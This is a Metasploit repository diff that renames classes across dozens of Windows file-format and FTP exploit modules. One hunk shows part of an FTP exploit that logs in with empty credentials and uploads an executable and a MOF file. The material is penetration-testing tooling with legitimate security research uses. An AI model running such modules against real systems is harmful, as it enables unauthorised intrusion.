+++ b/modules/exploits/windows/fileformat/publishit_pui.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb
index 0c922c9fd1..f39244cd4e 100644
--- a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb
+++ b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'rex/zip'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb
index 861ac3d898..04f4942631 100644
--- a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb
+++ b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
index c3012abef6..03a9a8ad81 100644
--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb
index 51179b1675..65584db42e 100644
--- a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb
+++ b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb
index 7dcc8d9617..49acb4a06d 100644
--- a/modules/exploits/windows/fileformat/sascam_get.rb
+++ b/modules/exploits/windows/fileformat/sascam_get.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = LowRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb
index 23358f9ad6..037ec684f9 100644
--- a/modules/exploits/windows/fileformat/scadaphone_zip.rb
+++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'rex/zip'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb
index a4676e030b..cb0f20199f 100644
--- a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb
+++ b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/somplplayer_m3u.rb b/modules/exploits/windows/fileformat/somplplayer_m3u.rb
index f4fb8022de..7f243b7e07 100644
--- a/modules/exploits/windows/fileformat/somplplayer_m3u.rb
+++ b/modules/exploits/windows/fileformat/somplplayer_m3u.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb
index 1d79f124e1..b005e87ed9 100644
--- a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb
+++ b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
index 476b0ed1ae..189433c05f 100644
--- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
+++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb
index 736e5311c5..1e6c0503bf 100644
--- a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb
+++ b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/tugzip.rb b/modules/exploits/windows/fileformat/tugzip.rb
index 5f822b0dae..4d12cb0ead 100644
--- a/modules/exploits/windows/fileformat/tugzip.rb
+++ b/modules/exploits/windows/fileformat/tugzip.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'rex/zip'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ultraiso_ccd.rb b/modules/exploits/windows/fileformat/ultraiso_ccd.rb
index 2ddbf829a4..2861864028 100644
--- a/modules/exploits/windows/fileformat/ultraiso_ccd.rb
+++ b/modules/exploits/windows/fileformat/ultraiso_ccd.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb
index 5c706c6424..2124a0580c 100644
--- a/modules/exploits/windows/fileformat/ultraiso_cue.rb
+++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb
index 8c4f170b83..9517eaab91 100644
--- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb
+++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/varicad_dwb.rb b/modules/exploits/windows/fileformat/varicad_dwb.rb
index c6bd57e032..538b44d520 100644
--- a/modules/exploits/windows/fileformat/varicad_dwb.rb
+++ b/modules/exploits/windows/fileformat/varicad_dwb.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb
index 68cbfde4ef..3ad0c240f7 100644
--- a/modules/exploits/windows/fileformat/videocharge_studio.rb
+++ b/modules/exploits/windows/fileformat/videocharge_studio.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb
index 42b4cb395e..a7670ff4e0 100644
--- a/modules/exploits/windows/fileformat/videolan_tivo.rb
+++ b/modules/exploits/windows/fileformat/videolan_tivo.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/videospirit_visprj.rb b/modules/exploits/windows/fileformat/videospirit_visprj.rb
index 337be73d0c..6c8280bc0a 100644
--- a/modules/exploits/windows/fileformat/videospirit_visprj.rb
+++ b/modules/exploits/windows/fileformat/videospirit_visprj.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/visio_dxf_bof.rb b/modules/exploits/windows/fileformat/visio_dxf_bof.rb
index 0a35ce8bce..ad4e9a8306 100644
--- a/modules/exploits/windows/fileformat/visio_dxf_bof.rb
+++ b/modules/exploits/windows/fileformat/visio_dxf_bof.rb
@@ -4,7 +4,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb
index b9474d67e7..92af418f47 100644
--- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb
+++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb
index 0e83aa1d3e..cc8c810bb0 100644
--- a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb
+++ b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/vlc_realtext.rb b/modules/exploits/windows/fileformat/vlc_realtext.rb
index 4048200658..9efaf4aa67 100644
--- a/modules/exploits/windows/fileformat/vlc_realtext.rb
+++ b/modules/exploits/windows/fileformat/vlc_realtext.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb
index cab592fca2..a2e8842571 100644
--- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb
+++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/vlc_webm.rb b/modules/exploits/windows/fileformat/vlc_webm.rb
index dac5f66d9a..381d95bef2 100644
--- a/modules/exploits/windows/fileformat/vlc_webm.rb
+++ b/modules/exploits/windows/fileformat/vlc_webm.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb
index 6169941ed8..a4c85b7258 100644
--- a/modules/exploits/windows/fileformat/vuplayer_cue.rb
+++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/vuplayer_m3u.rb b/modules/exploits/windows/fileformat/vuplayer_m3u.rb
index 4589c909f9..d903b448c3 100644
--- a/modules/exploits/windows/fileformat/vuplayer_m3u.rb
+++ b/modules/exploits/windows/fileformat/vuplayer_m3u.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb
index af6a94c36b..85a01388d8 100644
--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/winamp_maki_bof.rb b/modules/exploits/windows/fileformat/winamp_maki_bof.rb
index 0ee6a6a64b..4a9d750ab8 100644
--- a/modules/exploits/windows/fileformat/winamp_maki_bof.rb
+++ b/modules/exploits/windows/fileformat/winamp_maki_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb
index 21385fe87f..451b5cdff1 100644
--- a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb
+++ b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'rex/zip'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
index 7727f18446..07a51fe6c6 100644
--- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
+++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb
index 614d173074..c9bc390b9c 100644
--- a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb
+++ b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb
index 0c6ee32cda..c30ee3fbb9 100644
--- a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb
+++ b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb
index e6f7b78680..85090b33ae 100644
--- a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb
+++ b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb
index 9e217df2a7..461b7f28bc 100644
--- a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb
+++ b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb
index a70e7da10a..97067e3539 100644
--- a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb
+++ b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
index d3a93a3cfa..c2d91d9795 100644
--- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
+++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb
index b2aa38f375..af6d02d283 100644
--- a/modules/exploits/windows/firewall/blackice_pam_icq.rb
+++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::Udp
diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb
index 09ec293453..3bcb0cf970 100644
--- a/modules/exploits/windows/firewall/kerio_auth.rb
+++ b/modules/exploits/windows/firewall/kerio_auth.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/ftp/32bitftp_list_reply.rb b/modules/exploits/windows/ftp/32bitftp_list_reply.rb
index 88764b31c3..72d911d5a4 100644
--- a/modules/exploits/windows/ftp/32bitftp_list_reply.rb
+++ b/modules/exploits/windows/ftp/32bitftp_list_reply.rb
@@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework
 ##
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::FtpServer
diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
index 6ae2f48820..f4e9760d84 100644
--- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
+++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Ftp
diff --git a/modules/exploits/windows/ftp/aasync_list_reply.rb b/modules/exploits/windows/ftp/aasync_list_reply.rb
index 86675200e1..266e3fc0fa 100644
--- a/modules/exploits/windows/ftp/aasync_list_reply.rb
+++ b/modules/exploits/windows/ftp/aasync_list_reply.rb
@@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework
 ##
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::FtpServer
diff --git a/modules/exploits/windows/ftp/ability_server_stor.rb b/modules/exploits/windows/ftp/ability_server_stor.rb
index da254de1d6..13a3d851d9 100644
--- a/modules/exploits/windows/ftp/ability_server_stor.rb
+++ b/modules/exploits/windows/ftp/ability_server_stor.rb
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb index c740472f19..7eb93075e6 100644 --- a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb +++ b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/bison_ftp_bof.rb b/modules/exploits/windows/ftp/bison_ftp_bof.rb index 4e71775798..ffff7db5ed 100644 --- a/modules/exploits/windows/ftp/bison_ftp_bof.rb +++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index 0026fb5b96..68622d600e 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index ae905a9acd..207d0f486d 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index 2c2707a2c7..e0a1ab643f 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index 6223524b5b..1e4f688b9b 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index db15f4a362..2ced587670 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 07c9cb90fc..67dce18c44 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -14,7 +14,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb index 7991c3fe5c..fef06a6196 100644 --- a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb 
+++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index d876af7908..dbbe479d36 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/filewrangler_list_reply.rb b/modules/exploits/windows/ftp/filewrangler_list_reply.rb index 2757eadf85..763701eddd 100644 --- a/modules/exploits/windows/ftp/filewrangler_list_reply.rb +++ b/modules/exploits/windows/ftp/filewrangler_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/freefloatftp_user.rb b/modules/exploits/windows/ftp/freefloatftp_user.rb index 3352b4407e..1a21d31d2b 100644 --- a/modules/exploits/windows/ftp/freefloatftp_user.rb +++ b/modules/exploits/windows/ftp/freefloatftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb index e73e7c3d6e..31e7f97f65 100644 --- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb +++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp @@ -71,12 +71,12 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -88,28 +88,28 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) - print_status("#{peer} - Sending empty login...") + print_status("Sending empty login...") res = send_user("", conn) if not res or res !~ /331/ - print_error("#{peer} - Error sending username") + print_error("Error sending username") return false end res = send_pass("", conn) if not res or res !~ /230/ - print_error("#{peer} - Error sending password") + print_error("Error sending password") return false end - print_good("#{peer} - Empty authentication was successful") + print_good("Empty authentication was successful") # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") 